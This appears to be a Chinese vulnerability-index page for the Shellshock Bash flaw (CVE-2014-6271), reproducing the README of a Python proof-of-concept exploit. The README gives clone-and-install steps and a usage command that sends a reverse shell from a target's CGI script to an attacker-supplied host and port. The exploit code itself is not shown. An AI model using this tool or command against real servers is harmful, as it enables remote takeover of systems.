关联漏洞
标题:
GNU Bash 远程代码执行漏洞
(CVE-2014-6271)
描述:GNU Bash是美国软件开发者布莱恩-福克斯(Brian J. Fox)为GNU计划而编写的一个Shell(命令语言解释器),它运行于类Unix操作系统中(Linux系统的默认Shell),并能够从标准输入设备或文件中读取、执行命令,同时也结合了一部分ksh和csh的特点。 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用:OpenSSH sshd中的ForceComman
描述
CVE-2014-6271(RCE) poc Exploit
介绍
# 🚨 Shellshock RCE Exploit (CVE-2014-6271)
This is a Python exploit for the [Shellshock vulnerability (CVE-2014-6271)](https://nvd.nist.gov/vuln/detail/CVE-2014-6271), which affects **GNU Bash**. The exploit targets **CGI scripts** on vulnerable web servers and establishes a **reverse shell** to the attacker's machine.
---
## CVE ID
> **CVE-2014-6271**
---
## Disclaimer
This tool is intended **only for educational and ethical purposes**.
---
## Features
- Exploits vulnerable CGI scripts using Shellshock
- Reverse shell handler
- Supports:
- HTTP & HTTPS
- Custom CGI paths
- proxy support
- Interactive shell on success
## CVE Information
- **CVE**: [CVE-2014-6271](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)
- **Vulnerability**: GNU Bash environment variable command injection
- **Impact**: Remote Code Execution (RCE) crafted headers to CGI applications
## Requirements
- Python 3.x
- [`pwntools`](https://docs.pwntools.com/)
- [`requests`](https://docs.python-requests.org/)
## Install
```
sudo python3 -m pip install pwntools
sudo python3 -m pip install requests
git clone https://github.com/knightc0de/Shellshock_vuln_Exploit.git
cd Shellshock_vuln_Exploit/
chmod +x CVE-2014-6271.py
```
---
## Example Usage
```bash
python3 CVE-2014-6271 --rhost <target_ip> --lhost <your_ip> --lport <your_port> --pages /cgi-bin/test.cg
文件快照
[4.0K] /data/pocs/4f9792e45438a12406fe60ce7d10fd3d90c00627
├── [3.3K] CVE-2014-6271.py
├── [1.0K] LICENSE
└── [1.4K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。